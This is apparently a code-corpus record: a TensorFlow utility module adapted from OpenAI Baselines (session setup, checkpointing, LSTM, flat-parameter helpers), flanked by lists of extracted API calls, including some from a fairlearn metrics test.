"numpy.array_equal",
"fairlearn.metrics.group_recall_score"
]
| [((2279, 2346), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""func_tuple"""', 'supported_metrics_unweighted'], {}), "('func_tuple', supported_metrics_unweighted)\n", (2302, 2346), False, 'import pytest\n'), ((2896, 2968), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""func_tuple"""', 'supported_metrics_weighted_binary'], {}), "('func_tuple', supported_metrics_weighted_binary)\n", (2919, 2968), False, 'import pytest\n'), ((3442, 3507), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""func_tuple"""', 'supported_metrics_weighted'], {}), "('func_tuple', supported_metrics_weighted)\n", (3465, 3507), False, 'import pytest\n'), ((4169, 4238), 'fairlearn.metrics.group_accuracy_score', 'metrics.group_accuracy_score', (['Y_true', 'Y_pred', 'groups'], {'normalize': '(False)'}), '(Y_true, Y_pred, groups, normalize=False)\n', (4197, 4238), True, 'import fairlearn.metrics as metrics\n'), ((4263, 4304), 'sklearn.metrics.accuracy_score', 'skm.accuracy_score', (['Y_true', 'Y_pred', '(False)'], {}), '(Y_true, Y_pred, False)\n', (4281, 4304), True, 'import sklearn.metrics as skm\n'), ((4520, 4589), 'fairlearn.metrics.group_confusion_matrix', 'metrics.group_confusion_matrix', (['Y_true', 'Y_pred', 'groups'], {'labels': 'labels'}), '(Y_true, Y_pred, groups, labels=labels)\n', (4550, 4589), True, 'import fairlearn.metrics as metrics\n'), ((4613, 4664), 'sklearn.metrics.confusion_matrix', 'skm.confusion_matrix', (['Y_true', 'Y_pred'], {'labels': 'labels'}), '(Y_true, Y_pred, labels=labels)\n', (4633, 4664), True, 'import sklearn.metrics as skm\n'), ((4677, 4725), 'numpy.array_equal', 'np.array_equal', (['result.overall', 'expected_overall'], {}), '(result.overall, expected_overall)\n', (4691, 4725), True, 'import numpy as np\n'), ((4873, 4960), 'fairlearn.metrics.group_precision_score', 'metrics.group_precision_score', (['Y_true_ternary', 'Y_pred_ternary', 'group2'], {'average': 'None'}), '(Y_true_ternary, Y_pred_ternary, group2,\n average=None)\n', (4902, 4960), True, 'import fairlearn.metrics as metrics\n'), ((4980, 5045), 'sklearn.metrics.precision_score', 'skm.precision_score', (['Y_true_ternary', 'Y_pred_ternary'], {'average': 'None'}), '(Y_true_ternary, Y_pred_ternary, average=None)\n', (4999, 5045), True, 'import sklearn.metrics as skm\n'), ((5058, 5106), 'numpy.array_equal', 'np.array_equal', (['result.overall', 'expected_overall'], {}), '(result.overall, expected_overall)\n', (5072, 5106), True, 'import numpy as np\n'), ((5166, 5232), 'fairlearn.metrics.group_precision_score', 'metrics.group_precision_score', (['Y_true', 'Y_pred', 'groups'], {'pos_label': '(0)'}), '(Y_true, Y_pred, groups, pos_label=0)\n', (5195, 5232), True, 'import fairlearn.metrics as metrics\n'), ((5256, 5304), 'sklearn.metrics.precision_score', 'skm.precision_score', (['Y_true', 'Y_pred'], {'pos_label': '(0)'}), '(Y_true, Y_pred, pos_label=0)\n', (5275, 5304), True, 'import sklearn.metrics as skm\n'), ((5317, 5365), 'numpy.array_equal', 'np.array_equal', (['result.overall', 'expected_overall'], {}), '(result.overall, expected_overall)\n', (5331, 5365), True, 'import numpy as np\n'), ((5510, 5595), 'fairlearn.metrics.group_recall_score', 'metrics.group_recall_score', (['Y_true_ternary', 'Y_pred_ternary', 'group2'], {'average': 'None'}), '(Y_true_ternary, Y_pred_ternary, group2, average=None\n )\n', (5536, 5595), True, 'import fairlearn.metrics as metrics\n'), ((5614, 5676), 'sklearn.metrics.recall_score', 'skm.recall_score', (['Y_true_ternary', 'Y_pred_ternary'], {'average': 'None'}), 
'(Y_true_ternary, Y_pred_ternary, average=None)\n', (5630, 5676), True, 'import sklearn.metrics as skm\n'), ((5689, 5737), 'numpy.array_equal', 'np.array_equal', (['result.overall', 'expected_overall'], {}), '(result.overall, expected_overall)\n', (5703, 5737), True, 'import numpy as np\n'), ((5794, 5857), 'fairlearn.metrics.group_recall_score', 'metrics.group_recall_score', (['Y_true', 'Y_pred', 'groups'], {'pos_label': '(0)'}), '(Y_true, Y_pred, groups, pos_label=0)\n', (5820, 5857), True, 'import fairlearn.metrics as metrics\n'), ((5881, 5926), 'sklearn.metrics.recall_score', 'skm.recall_score', (['Y_true', 'Y_pred'], {'pos_label': '(0)'}), '(Y_true, Y_pred, pos_label=0)\n', (5897, 5926), True, 'import sklearn.metrics as skm\n'), ((5939, 5987), 'numpy.array_equal', 'np.array_equal', (['result.overall', 'expected_overall'], {}), '(result.overall, expected_overall)\n', (5953, 5987), True, 'import numpy as np\n'), ((6133, 6203), 'fairlearn.metrics.group_roc_auc_score', 'metrics.group_roc_auc_score', (['Y_true', 'Y_pred', 'groups'], {'average': '"""samples"""'}), "(Y_true, Y_pred, groups, average='samples')\n", (6160, 6203), True, 'import fairlearn.metrics as metrics\n'), ((6227, 6279), 'sklearn.metrics.roc_auc_score', 'skm.roc_auc_score', (['Y_true', 'Y_pred'], {'average': '"""samples"""'}), "(Y_true, Y_pred, average='samples')\n", (6244, 6279), True, 'import sklearn.metrics as skm\n'), ((6382, 6446), 'fairlearn.metrics.group_roc_auc_score', 'metrics.group_roc_auc_score', (['Y_true', 'Y_pred', 'groups'], {'max_fpr': '(0.5)'}), '(Y_true, Y_pred, groups, max_fpr=0.5)\n', (6409, 6446), True, 'import fairlearn.metrics as metrics\n'), ((6470, 6516), 'sklearn.metrics.roc_auc_score', 'skm.roc_auc_score', (['Y_true', 'Y_pred'], {'max_fpr': '(0.5)'}), '(Y_true, Y_pred, max_fpr=0.5)\n', (6487, 6516), True, 'import sklearn.metrics as skm\n'), ((6714, 6782), 'fairlearn.metrics.group_zero_one_loss', 'metrics.group_zero_one_loss', (['Y_true', 'Y_pred', 'groups'], {'normalize': '(False)'}), '(Y_true, Y_pred, groups, normalize=False)\n', (6741, 6782), True, 'import fairlearn.metrics as metrics\n'), ((6807, 6847), 'sklearn.metrics.zero_one_loss', 'skm.zero_one_loss', (['Y_true', 'Y_pred', '(False)'], {}), '(Y_true, Y_pred, False)\n', (6824, 6847), True, 'import sklearn.metrics as skm\n'), ((7153, 7229), 'fairlearn.metrics.group_mean_squared_error', 'metrics.group_mean_squared_error', (['y_t', 'y_p', 'groups'], {'multioutput': '"""raw_values"""'}), "(y_t, y_p, groups, multioutput='raw_values')\n", (7185, 7229), True, 'import fairlearn.metrics as metrics\n'), ((7254, 7312), 'sklearn.metrics.mean_squared_error', 'skm.mean_squared_error', (['y_t', 'y_p'], {'multioutput': '"""raw_values"""'}), "(y_t, y_p, multioutput='raw_values')\n", (7276, 7312), True, 'import sklearn.metrics as skm\n'), ((7325, 7373), 'numpy.array_equal', 'np.array_equal', (['result.overall', 'expected_overall'], {}), '(result.overall, expected_overall)\n', (7339, 7373), True, 'import numpy as np\n'), ((7607, 7673), 'fairlearn.metrics.group_r2_score', 'metrics.group_r2_score', (['y_t', 'y_p', 'groups'], {'multioutput': '"""raw_values"""'}), "(y_t, y_p, groups, multioutput='raw_values')\n", (7629, 7673), True, 'import fairlearn.metrics as metrics\n'), ((7698, 7746), 'sklearn.metrics.r2_score', 'skm.r2_score', (['y_t', 'y_p'], {'multioutput': '"""raw_values"""'}), "(y_t, y_p, multioutput='raw_values')\n", (7710, 7746), True, 'import sklearn.metrics as skm\n'), ((7759, 7807), 'numpy.array_equal', 'np.array_equal', (['result.overall', 
'expected_overall'], {}), '(result.overall, expected_overall)\n', (7773, 7807), True, 'import numpy as np\n'), ((7832, 7849), 'numpy.unique', 'np.unique', (['groups'], {}), '(groups)\n', (7841, 7849), True, 'import numpy as np\n'), ((8318, 8394), 'fairlearn.metrics.group_mean_squared_error', 'metrics.group_mean_squared_error', (['y_t', 'y_p', 'groups'], {'multioutput': '"""raw_values"""'}), "(y_t, y_p, groups, multioutput='raw_values')\n", (8350, 8394), True, 'import fairlearn.metrics as metrics\n'), ((8419, 8477), 'sklearn.metrics.mean_squared_error', 'skm.mean_squared_error', (['y_t', 'y_p'], {'multioutput': '"""raw_values"""'}), "(y_t, y_p, multioutput='raw_values')\n", (8441, 8477), True, 'import sklearn.metrics as skm\n'), ((8490, 8538), 'numpy.array_equal', 'np.array_equal', (['result.overall', 'expected_overall'], {}), '(result.overall, expected_overall)\n', (8504, 8538), True, 'import numpy as np\n'), ((8564, 8581), 'numpy.unique', 'np.unique', (['groups'], {}), '(groups)\n', (8573, 8581), True, 'import numpy as np\n'), ((2784, 2832), 'numpy.array_equal', 'np.array_equal', (['expected_overall', 'result.overall'], {}), '(expected_overall, result.overall)\n', (2798, 2832), True, 'import numpy as np\n'), ((3330, 3378), 'numpy.array_equal', 'np.array_equal', (['expected_overall', 'result.overall'], {}), '(expected_overall, result.overall)\n', (3344, 3378), True, 'import numpy as np\n'), ((3909, 3957), 'numpy.array_equal', 'np.array_equal', (['expected_overall', 'result.overall'], {}), '(expected_overall, result.overall)\n', (3923, 3957), True, 'import numpy as np\n'), ((7920, 7980), 'sklearn.metrics.r2_score', 'skm.r2_score', (['y_t[mask]', 'y_p[mask]'], {'multioutput': '"""raw_values"""'}), "(y_t[mask], y_p[mask], multioutput='raw_values')\n", (7932, 7980), True, 'import sklearn.metrics as skm\n'), ((7996, 8051), 'numpy.array_equal', 'np.array_equal', (['result.by_group[target_group]', 'expected'], {}), '(result.by_group[target_group], expected)\n', (8010, 8051), True, 'import numpy as np\n'), ((8224, 8241), 'numpy.random.rand', 'np.random.rand', (['(2)'], {}), '(2)\n', (8238, 8241), True, 'import numpy as np\n'), ((8270, 8287), 'numpy.random.rand', 'np.random.rand', (['(2)'], {}), '(2)\n', (8284, 8287), True, 'import numpy as np\n'), ((8797, 8861), 'sklearn.metrics.mean_squared_error', 'skm.mean_squared_error', (['y_true', 'y_pred'], {'multioutput': '"""raw_values"""'}), "(y_true, y_pred, multioutput='raw_values')\n", (8819, 8861), True, 'import sklearn.metrics as skm\n'), ((8877, 8932), 'numpy.array_equal', 'np.array_equal', (['result.by_group[target_group]', 'expected'], {}), '(result.by_group[target_group], expected)\n', (8891, 8932), True, 'import numpy as np\n'), ((7866, 7884), 'numpy.asarray', 'np.asarray', (['groups'], {}), '(groups)\n', (7876, 7884), True, 'import numpy as np\n')] |
"""
Adapted from OpenAI Baselines.
"""
import numpy as np
import tensorflow as tf # pylint: ignore-module
import random
import copy
import os
import functools
import collections
import multiprocessing
def switch(condition, then_expression, else_expression):
"""Switches between two operations depending on a scalar value (int or bool).
Note that both `then_expression` and `else_expression`
should be symbolic tensors of the *same shape*.
# Arguments
condition: scalar tensor.
then_expression: TensorFlow operation.
else_expression: TensorFlow operation.
"""
x_shape = copy.copy(then_expression.get_shape())
x = tf.cond(tf.cast(condition, 'bool'),
lambda: then_expression,
lambda: else_expression)
x.set_shape(x_shape)
return x
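# Illustrative usage (names assumed, not part of the original module): both
# branches must share the same static shape, e.g.
#   use_target = tf.placeholder(tf.bool, ())
#   q = switch(use_target, target_net_out, online_net_out)
# evaluates to target_net_out when use_target is True and online_net_out otherwise.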
# ================================================================
# Extras
# ================================================================
def lrelu(x, leak=0.2):
f1 = 0.5 * (1 + leak)
f2 = 0.5 * (1 - leak)
return f1 * x + f2 * abs(x)
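# Note that f1 * x + f2 * abs(x) equals x for x >= 0 and leak * x for x < 0,
# i.e. this is the usual leaky ReLU written without a conditional.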
# ================================================================
# Mathematical utils
# ================================================================
def huber_loss(x, delta=1.0):
"""Reference: https://en.wikipedia.org/wiki/Huber_loss"""
return tf.where(
tf.abs(x) < delta,
tf.square(x) * 0.5,
delta * (tf.abs(x) - 0.5 * delta)
)
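# Piecewise form: 0.5 * x**2 when |x| < delta, and delta * (|x| - 0.5 * delta)
# otherwise; quadratic near zero, linear in the tails, continuous at |x| = delta.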
# ================================================================
# Global session
# ================================================================
def make_session(num_cpu=None, make_default=False):
"""Returns a session that will use <num_cpu> CPU's only"""
if num_cpu is None:
num_cpu = int(os.getenv('RCALL_NUM_CPU', multiprocessing.cpu_count()))
tf_config = tf.ConfigProto(
inter_op_parallelism_threads=num_cpu,
intra_op_parallelism_threads=num_cpu)
tf_config.gpu_options.allocator_type = 'BFC'
if make_default:
return tf.InteractiveSession(config=tf_config)
else:
return tf.Session(config=tf_config)
def single_threaded_session():
"""Returns a session which will only use a single CPU"""
return make_session(num_cpu=1)
def in_session(f):
@functools.wraps(f)
def newfunc(*args, **kwargs):
with tf.Session():
f(*args, **kwargs)
return newfunc
ALREADY_INITIALIZED = set()
def initialize():
"""Initialize all the uninitialized variables in the global scope."""
new_variables = set(tf.global_variables()) - ALREADY_INITIALIZED
tf.get_default_session().run(tf.variables_initializer(new_variables))
ALREADY_INITIALIZED.update(new_variables)
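# Typical flow (illustrative): build the graph, create a session via
# make_session(...) or single_threaded_session(), then call initialize() once
# before the first run. Because already-initialized variables are tracked in
# ALREADY_INITIALIZED, initialize() can safely be called again after new
# variables are added to the graph.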
# ================================================================
# Saving variables and setting up experiment directories
# ================================================================
def load_state(fname):
saver = tf.train.Saver()
saver.restore(tf.get_default_session(), fname)
def save_state(fname):
os.makedirs(os.path.dirname(fname), exist_ok=True)
saver = tf.train.Saver()
saver.save(tf.get_default_session(), fname)
def load(fname):
import cloudpickle
with open(fname, 'rb') as f:
return cloudpickle.load(f)
def save(fname, obj):
import cloudpickle
os.makedirs(os.path.dirname(fname), exist_ok=True)
with open(fname, 'wb') as fh:
cloudpickle.dump(obj, fh)
class Experiment(object):
def __init__(self, logdir):
self.logdir = logdir
os.makedirs(os.path.join(logdir, 'checkpoints'), exist_ok=True)
def load(self, timestep=None):
if timestep is None:
# get latest ckpt
import glob
fs = glob.glob(os.path.join(self.logdir, 'checkpoints/*'))
timesteps = []
for f in fs:
try: timesteps.append(int(os.path.basename(f)))
except: pass
if len(timesteps) == 0:
return 0
timestep = max(timesteps)
fname = os.path.join(self.logdir, 'checkpoints', str(timestep), 'model')
load_state(fname)
return timestep
def save(self, timestep):
fname = os.path.join(self.logdir, 'checkpoints', str(timestep), 'model')
save_state(fname)
def load_model_fn(self):
fname = os.path.join(self.logdir, 'checkpoints/model_fn.pkl')
assert os.path.exists(fname), "No model file saved."
return load(fname)
def save_model_fn(self, model_fn):
fname = os.path.join(self.logdir, 'checkpoints/model_fn.pkl')
save(fname, model_fn)
# ================================================================
# Model components
# ================================================================
def batch_to_seq(h, nbatch, nsteps, flat=False):
"""
Assumes Time major data!!
x.shape = [nsteps, nbatch, *obs_shape]
    h = x.reshape([-1, *x.shape[2:]])
"""
if flat:
h = tf.reshape(h, [nsteps, nbatch])
else:
h = tf.reshape(h, [nsteps, nbatch, -1])
return [tf.squeeze(v, [0]) for v in tf.split(axis=0, num_or_size_splits=nsteps, value=h)]
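# Shape example (illustrative, flat=False): with nsteps=5, nbatch=4 and h of
# shape [5 * 4, nh], batch_to_seq returns a list of 5 tensors, each of shape
# [4, nh]. seq_to_batch below is the inverse operation.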
def seq_to_batch(h, flat = False):
"""
Assumes Time major data!!
x.shape = [nsteps, nbatch, *obs_shape]
x = output.reshape(nsteps, nbatch, *obs_shape), where output is the output of this function.
"""
shape = h[0].get_shape().as_list()
if not flat:
assert(len(shape) > 1)
nh = h[0].get_shape()[-1].value
return tf.reshape(tf.concat(axis=0, values=h), [-1, nh])
else:
return tf.reshape(tf.stack(values=h, axis=0), [-1])
def ortho_init(scale=1.0):
def _ortho_init(shape, dtype, partition_info=None):
#lasagne ortho init for tf
shape = tuple(shape)
if len(shape) == 2:
flat_shape = shape
elif len(shape) == 4: # assumes NHWC
flat_shape = (np.prod(shape[:-1]), shape[-1])
else:
raise NotImplementedError
a = np.random.normal(0.0, 1.0, flat_shape)
u, _, v = np.linalg.svd(a, full_matrices=False)
q = u if u.shape == flat_shape else v # pick the one with the correct shape
q = q.reshape(shape)
return (scale * q[:shape[0], :shape[1]]).astype(np.float32)
return _ortho_init
def normc_initializer(std=1.0):
def _initializer(shape, dtype=None, partition_info=None): # pylint: disable=W0613
out = np.random.randn(*shape).astype(np.float32)
out *= std / np.sqrt(np.square(out).sum(axis=0, keepdims=True))
return tf.constant(out)
return _initializer
def lstm(xs, ms, s, scope, nh, init_scale=1.0):
nbatch, nin = [v.value for v in xs[0].get_shape()]
nsteps = len(xs)
with tf.variable_scope(scope):
wx = tf.get_variable("wx", [nin, nh*4], initializer=ortho_init(init_scale))
wh = tf.get_variable("wh", [nh, nh*4], initializer=ortho_init(init_scale))
b = tf.get_variable("b", [nh*4], initializer=tf.constant_initializer(0.0))
c, h = tf.split(axis=1, num_or_size_splits=2, value=s)
for idx, (x, m) in enumerate(zip(xs, ms)):
c = c*(1-m)
h = h*(1-m)
z = tf.matmul(x, wx) + tf.matmul(h, wh) + b
i, f, o, u = tf.split(axis=1, num_or_size_splits=4, value=z)
i = tf.nn.sigmoid(i)
f = tf.nn.sigmoid(f)
o = tf.nn.sigmoid(o)
u = tf.tanh(u)
c = f*c + i*u
h = o*tf.tanh(c)
xs[idx] = h
s = tf.concat(axis=1, values=[c, h])
return xs, s
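# Expected shapes (derived from the code above): xs and ms are length-nsteps
# lists, each x of shape [nbatch, nin] and each mask m broadcastable against
# [nbatch, nh] (typically [nbatch, 1]); s packs the cell and hidden state as
# [nbatch, 2 * nh]. The mask resets the carried state wherever it is 1
# (episode boundaries), and the function returns the per-step hidden states
# plus the final packed state.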
# ================================================================
# Theano-like Function
# ================================================================
def function(inputs, outputs, updates=None, givens=None):
"""Just like Theano function. Take a bunch of tensorflow placeholders and expressions
computed based on those placeholders and produces f(inputs) -> outputs. Function f takes
values to be fed to the input's placeholders and produces the values of the expressions
in outputs.
Input values can be passed in the same order as inputs or can be provided as kwargs based
on placeholder name (passed to constructor or accessible via placeholder.op.name).
Example:
x = tf.placeholder(tf.int32, (), name="x")
y = tf.placeholder(tf.int32, (), name="y")
z = 3 * x + 2 * y
lin = function([x, y], z, givens={y: 0})
with single_threaded_session():
initialize()
assert lin(2) == 6
assert lin(x=3) == 9
assert lin(2, 2) == 10
assert lin(x=2, y=3) == 12
Parameters
----------
inputs: [tf.placeholder, tf.constant, or object with make_feed_dict method]
list of input arguments
outputs: [tf.Variable] or tf.Variable
list of outputs or a single output to be returned from function. Returned
value will also have the same shape.
"""
if isinstance(outputs, list):
return _Function(inputs, outputs, updates, givens=givens)
elif isinstance(outputs, (dict, collections.OrderedDict)):
f = _Function(inputs, outputs.values(), updates, givens=givens)
return lambda *args, **kwargs: type(outputs)(zip(outputs.keys(), f(*args, **kwargs)))
else:
f = _Function(inputs, [outputs], updates, givens=givens)
return lambda *args, **kwargs: f(*args, **kwargs)[0]
class _Function(object):
def __init__(self, inputs, outputs, updates, givens):
# for inpt in inputs:
# if not hasattr(inpt, 'make_feed_dict') and not (type(inpt) is tf.Tensor and len(inpt.op.inputs) == 0):
# assert False, "inputs should all be placeholders, constants, or have a make_feed_dict method"
self.inputs = inputs
updates = updates or []
self.update_group = tf.group(*updates)
self.outputs_update = list(outputs) + [self.update_group]
self.givens = {} if givens is None else givens
def _feed_input(self, feed_dict, inpt, value):
if hasattr(inpt, 'make_feed_dict'):
feed_dict.update(inpt.make_feed_dict(value))
else:
feed_dict[inpt] = value
def __call__(self, *args):
assert len(args) <= len(self.inputs), "Too many arguments provided"
feed_dict = {}
# Update the args
for inpt, value in zip(self.inputs, args):
if value is not None:
self._feed_input(feed_dict, inpt, value)
# Update feed dict with givens.
for inpt in self.givens:
feed_dict[inpt] = feed_dict.get(inpt, self.givens[inpt])
results = tf.get_default_session().run(self.outputs_update, feed_dict=feed_dict)[:-1]
return results
# ================================================================
# Flat vectors
# ================================================================
def var_shape(x):
out = x.get_shape().as_list()
assert all(isinstance(a, int) for a in out), \
"shape function assumes that shape is fully known"
return out
def numel(x):
return intprod(var_shape(x))
def intprod(x):
return int(np.prod(x))
def flatgrad(loss, var_list, clip_norm=None):
grads = tf.gradients(loss, var_list)
if clip_norm is not None:
grads, _ = tf.clip_by_global_norm(grads, clip_norm=clip_norm)
return tf.concat(axis=0, values=[
tf.reshape(grad if grad is not None else tf.zeros_like(v), [numel(v)])
for (v, grad) in zip(var_list, grads)
])
class SetFromFlat(object):
def __init__(self, var_list, dtype=tf.float32):
assigns = []
shapes = list(map(var_shape, var_list))
total_size = np.sum([intprod(shape) for shape in shapes])
self.theta = theta = tf.placeholder(dtype, [total_size])
start = 0
assigns = []
for (shape, v) in zip(shapes, var_list):
size = intprod(shape)
assigns.append(tf.assign(v, tf.reshape(theta[start:start + size], shape)))
start += size
self.op = tf.group(*assigns)
def __call__(self, theta):
tf.get_default_session().run(self.op, feed_dict={self.theta: theta})
class GetFlat(object):
def __init__(self, var_list):
self.op = tf.concat(axis=0, values=[tf.reshape(v, [numel(v)]) for v in var_list])
def __call__(self):
return tf.get_default_session().run(self.op)
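# Illustrative round trip (names assumed, not from the original file):
#   var_list = tf.trainable_variables()
#   get_flat, set_from_flat = GetFlat(var_list), SetFromFlat(var_list)
#   theta = get_flat()        # 1-D numpy vector of all parameter values
#   set_from_flat(theta)      # writes the same values back into the variables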
def flattenallbut0(x):
return tf.reshape(x, [-1, intprod(x.get_shape().as_list()[1:])])
def reset():
global ALREADY_INITIALIZED
ALREADY_INITIALIZED = set()
tf.reset_default_graph()
"""
Random Seeds
"""
def set_global_seeds(i):
try:
import tensorflow as tf
except ImportError:
pass
else:
tf.set_random_seed(i)
np.random.seed(i)
random.seed(i)
| [
"numpy.prod",
"tensorflow.tanh",
"tensorflow.split",
"tensorflow.get_default_session",
"multiprocessing.cpu_count",
"tensorflow.gradients",
"tensorflow.group",
"tensorflow.cast",
"tensorflow.variables_initializer",
"tensorflow.set_random_seed",
"tensorflow.clip_by_global_norm",
"cloudpickle.load",
"os.path.exists",
"tensorflow.Session",
"tensorflow.placeholder",
"functools.wraps",
"tensorflow.concat",
"tensorflow.nn.sigmoid",
"numpy.random.seed",
"tensorflow.matmul",
"tensorflow.square",
"tensorflow.zeros_like",
"tensorflow.ConfigProto",
"tensorflow.stack",
"numpy.random.normal",
"tensorflow.InteractiveSession",
"tensorflow.variable_scope",
"tensorflow.global_variables",
"numpy.square",
"os.path.dirname",
"cloudpickle.dump",
"tensorflow.reshape",
"numpy.linalg.svd",
"numpy.random.randn",
"tensorflow.reset_default_graph",
"tensorflow.train.Saver",
"os.path.join",
"random.seed",
"tensorflow.constant",
"tensorflow.constant_initializer",
"os.path.basename",
"tensorflow.squeeze",
"tensorflow.abs"
]
| [((1837, 1931), 'tensorflow.ConfigProto', 'tf.ConfigProto', ([], {'inter_op_parallelism_threads': 'num_cpu', 'intra_op_parallelism_threads': 'num_cpu'}), '(inter_op_parallelism_threads=num_cpu,\n intra_op_parallelism_threads=num_cpu)\n', (1851, 1931), True, 'import tensorflow as tf\n'), ((2277, 2295), 'functools.wraps', 'functools.wraps', (['f'], {}), '(f)\n', (2292, 2295), False, 'import functools\n'), ((2946, 2962), 'tensorflow.train.Saver', 'tf.train.Saver', ([], {}), '()\n', (2960, 2962), True, 'import tensorflow as tf\n'), ((3105, 3121), 'tensorflow.train.Saver', 'tf.train.Saver', ([], {}), '()\n', (3119, 3121), True, 'import tensorflow as tf\n'), ((7065, 7112), 'tensorflow.split', 'tf.split', ([], {'axis': '(1)', 'num_or_size_splits': '(2)', 'value': 's'}), '(axis=1, num_or_size_splits=2, value=s)\n', (7073, 7112), True, 'import tensorflow as tf\n'), ((7506, 7538), 'tensorflow.concat', 'tf.concat', ([], {'axis': '(1)', 'values': '[c, h]'}), '(axis=1, values=[c, h])\n', (7515, 7538), True, 'import tensorflow as tf\n'), ((11241, 11269), 'tensorflow.gradients', 'tf.gradients', (['loss', 'var_list'], {}), '(loss, var_list)\n', (11253, 11269), True, 'import tensorflow as tf\n'), ((12602, 12626), 'tensorflow.reset_default_graph', 'tf.reset_default_graph', ([], {}), '()\n', (12624, 12626), True, 'import tensorflow as tf\n'), ((12796, 12813), 'numpy.random.seed', 'np.random.seed', (['i'], {}), '(i)\n', (12810, 12813), True, 'import numpy as np\n'), ((12818, 12832), 'random.seed', 'random.seed', (['i'], {}), '(i)\n', (12829, 12832), False, 'import random\n'), ((676, 702), 'tensorflow.cast', 'tf.cast', (['condition', '"""bool"""'], {}), "(condition, 'bool')\n", (683, 702), True, 'import tensorflow as tf\n'), ((2030, 2069), 'tensorflow.InteractiveSession', 'tf.InteractiveSession', ([], {'config': 'tf_config'}), '(config=tf_config)\n', (2051, 2069), True, 'import tensorflow as tf\n'), ((2095, 2123), 'tensorflow.Session', 'tf.Session', ([], {'config': 'tf_config'}), '(config=tf_config)\n', (2105, 2123), True, 'import tensorflow as tf\n'), ((2631, 2670), 'tensorflow.variables_initializer', 'tf.variables_initializer', (['new_variables'], {}), '(new_variables)\n', (2655, 2670), True, 'import tensorflow as tf\n'), ((2981, 3005), 'tensorflow.get_default_session', 'tf.get_default_session', ([], {}), '()\n', (3003, 3005), True, 'import tensorflow as tf\n'), ((3054, 3076), 'os.path.dirname', 'os.path.dirname', (['fname'], {}), '(fname)\n', (3069, 3076), False, 'import os\n'), ((3137, 3161), 'tensorflow.get_default_session', 'tf.get_default_session', ([], {}), '()\n', (3159, 3161), True, 'import tensorflow as tf\n'), ((3259, 3278), 'cloudpickle.load', 'cloudpickle.load', (['f'], {}), '(f)\n', (3275, 3278), False, 'import cloudpickle\n'), ((3341, 3363), 'os.path.dirname', 'os.path.dirname', (['fname'], {}), '(fname)\n', (3356, 3363), False, 'import os\n'), ((3422, 3447), 'cloudpickle.dump', 'cloudpickle.dump', (['obj', 'fh'], {}), '(obj, fh)\n', (3438, 3447), False, 'import cloudpickle\n'), ((4357, 4410), 'os.path.join', 'os.path.join', (['self.logdir', '"""checkpoints/model_fn.pkl"""'], {}), "(self.logdir, 'checkpoints/model_fn.pkl')\n", (4369, 4410), False, 'import os\n'), ((4426, 4447), 'os.path.exists', 'os.path.exists', (['fname'], {}), '(fname)\n', (4440, 4447), False, 'import os\n'), ((4555, 4608), 'os.path.join', 'os.path.join', (['self.logdir', '"""checkpoints/model_fn.pkl"""'], {}), "(self.logdir, 'checkpoints/model_fn.pkl')\n", (4567, 4608), False, 'import os\n'), ((4997, 5028), 
'tensorflow.reshape', 'tf.reshape', (['h', '[nsteps, nbatch]'], {}), '(h, [nsteps, nbatch])\n', (5007, 5028), True, 'import tensorflow as tf\n'), ((5051, 5086), 'tensorflow.reshape', 'tf.reshape', (['h', '[nsteps, nbatch, -1]'], {}), '(h, [nsteps, nbatch, -1])\n', (5061, 5086), True, 'import tensorflow as tf\n'), ((5099, 5117), 'tensorflow.squeeze', 'tf.squeeze', (['v', '[0]'], {}), '(v, [0])\n', (5109, 5117), True, 'import tensorflow as tf\n'), ((6039, 6077), 'numpy.random.normal', 'np.random.normal', (['(0.0)', '(1.0)', 'flat_shape'], {}), '(0.0, 1.0, flat_shape)\n', (6055, 6077), True, 'import numpy as np\n'), ((6096, 6133), 'numpy.linalg.svd', 'np.linalg.svd', (['a'], {'full_matrices': '(False)'}), '(a, full_matrices=False)\n', (6109, 6133), True, 'import numpy as np\n'), ((6602, 6618), 'tensorflow.constant', 'tf.constant', (['out'], {}), '(out)\n', (6613, 6618), True, 'import tensorflow as tf\n'), ((6777, 6801), 'tensorflow.variable_scope', 'tf.variable_scope', (['scope'], {}), '(scope)\n', (6794, 6801), True, 'import tensorflow as tf\n'), ((7273, 7320), 'tensorflow.split', 'tf.split', ([], {'axis': '(1)', 'num_or_size_splits': '(4)', 'value': 'z'}), '(axis=1, num_or_size_splits=4, value=z)\n', (7281, 7320), True, 'import tensorflow as tf\n'), ((7333, 7349), 'tensorflow.nn.sigmoid', 'tf.nn.sigmoid', (['i'], {}), '(i)\n', (7346, 7349), True, 'import tensorflow as tf\n'), ((7362, 7378), 'tensorflow.nn.sigmoid', 'tf.nn.sigmoid', (['f'], {}), '(f)\n', (7375, 7378), True, 'import tensorflow as tf\n'), ((7391, 7407), 'tensorflow.nn.sigmoid', 'tf.nn.sigmoid', (['o'], {}), '(o)\n', (7404, 7407), True, 'import tensorflow as tf\n'), ((7420, 7430), 'tensorflow.tanh', 'tf.tanh', (['u'], {}), '(u)\n', (7427, 7430), True, 'import tensorflow as tf\n'), ((9861, 9879), 'tensorflow.group', 'tf.group', (['*updates'], {}), '(*updates)\n', (9869, 9879), True, 'import tensorflow as tf\n'), ((11170, 11180), 'numpy.prod', 'np.prod', (['x'], {}), '(x)\n', (11177, 11180), True, 'import numpy as np\n'), ((11319, 11369), 'tensorflow.clip_by_global_norm', 'tf.clip_by_global_norm', (['grads'], {'clip_norm': 'clip_norm'}), '(grads, clip_norm=clip_norm)\n', (11341, 11369), True, 'import tensorflow as tf\n'), ((11785, 11820), 'tensorflow.placeholder', 'tf.placeholder', (['dtype', '[total_size]'], {}), '(dtype, [total_size])\n', (11799, 11820), True, 'import tensorflow as tf\n'), ((12074, 12092), 'tensorflow.group', 'tf.group', (['*assigns'], {}), '(*assigns)\n', (12082, 12092), True, 'import tensorflow as tf\n'), ((12770, 12791), 'tensorflow.set_random_seed', 'tf.set_random_seed', (['i'], {}), '(i)\n', (12788, 12791), True, 'import tensorflow as tf\n'), ((1355, 1364), 'tensorflow.abs', 'tf.abs', (['x'], {}), '(x)\n', (1361, 1364), True, 'import tensorflow as tf\n'), ((1382, 1394), 'tensorflow.square', 'tf.square', (['x'], {}), '(x)\n', (1391, 1394), True, 'import tensorflow as tf\n'), ((2343, 2355), 'tensorflow.Session', 'tf.Session', ([], {}), '()\n', (2353, 2355), True, 'import tensorflow as tf\n'), ((2553, 2574), 'tensorflow.global_variables', 'tf.global_variables', ([], {}), '()\n', (2572, 2574), True, 'import tensorflow as tf\n'), ((2602, 2626), 'tensorflow.get_default_session', 'tf.get_default_session', ([], {}), '()\n', (2624, 2626), 